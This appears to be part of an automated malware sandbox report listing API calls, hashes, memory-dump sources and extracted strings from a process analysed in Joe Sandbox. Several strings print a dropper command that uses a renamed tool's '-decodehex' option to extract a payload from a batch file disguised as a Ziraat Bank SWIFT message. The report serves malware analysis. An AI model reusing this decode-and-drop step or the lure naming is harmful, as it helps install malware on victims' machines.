                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3829876242-4171432244
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X$P<dwj`$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2748242238-2177630653
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FAT$P<dwj`$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2238823677-699400580
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC084E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00007FF706EDC1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDC31C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF706EDC5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s $%s>$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes$P<dwj`$PROMPT$Unknown$\$x
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2242554020-3736011297
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f45b04878c373140482bd9bf728b90acdb964024760a201dc50eba82409da46
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4127E65A1875281EA20BB14AC2417BA3A4FF44FE4FE85235DA6E437E4DF3CE546C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-671101016
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4d2125c1ecaa67cd59dd69a2b973508792c6f1a7df2824e364ffd51823101f0d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99515D24E0C7438AFB14BF20AC342BBAA90BF55B95FC05035D71E4A2A5DF3CA5469770
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`$\\.\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 799470305-1480106071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8f89f457e5e974f25ae8aed240be47954c3efcee5af9ab1622c6e1307dc4812d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3db15ab557e2e3ffb4c97bc6f2d5bc8e4c2b62e3e7f52a40e25e558ef806ecb4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f89f457e5e974f25ae8aed240be47954c3efcee5af9ab1622c6e1307dc4812d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5251B932A08B8286EF60AF24DC202BAF7A1FF85B64F854535DA0E47794DF3CD5468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$P<dwj`$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3961617410-776848485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 19e234b5e15a76cc87d87d26b1c40dcbabb780ebb02299da316765917ecde753
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7219222A0874286E7506B64BD740BBFAA1FF89BA5BC49231D91F43794DF3CD4458621
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1944892715-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a66102e4018c1b0e4353d172b043d29de28c8b8a374d8e305c45668d0cbcabd6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6B1AF65A0974286EA20BF11AC7117BF6A5FF55B94FC89636CA4E4B3D0EF3CE4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1580871199-1829598055
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7fa98e7e90ab5c797e0921a17f2bd6ddc7abb066178f05ede1012cb9490a81b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70516271B18B8286EB50AF15EC1027AB7A5FF88B84F885135DA5E47B98DF3CE501C714
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DIRCMD$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1405722092-1814592724
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c55531eb54789366c3258dd2569913d9856292727ababeaf9ab1e689f2bac408
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0814B72A18BC18AEB20EF20AC902EE77A4FF48748F945139DB8D57B58DF38D2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 920682188-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a1e5131e08feca5547cee2d1f88c231bf885b8bc60576f1ea1a1c0fa656bdbfb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98512836705B858AEB25EF21DC642E9B7A1FF88B88F888135CA4D4B754EF3CD6458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0148
                                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 734197835-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcsspn
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3809306610-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes, xrefs: 00007FF706EBE00B
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 777023205-2473208872
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`$_p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1078844751-2179930112
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %5lu$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`$[%s]
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 140117192-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1029679093-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD01C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD033
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD06D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD07F
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1033415088-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60251fb671124d7ef309f3ef71bf202c2e6a0c1a4cefa2fc5aa950af45a7b142
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6112576618B42C6EA109F10E85026BFBA0FB89764F805225EB8D03B68DF7DC048CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmp
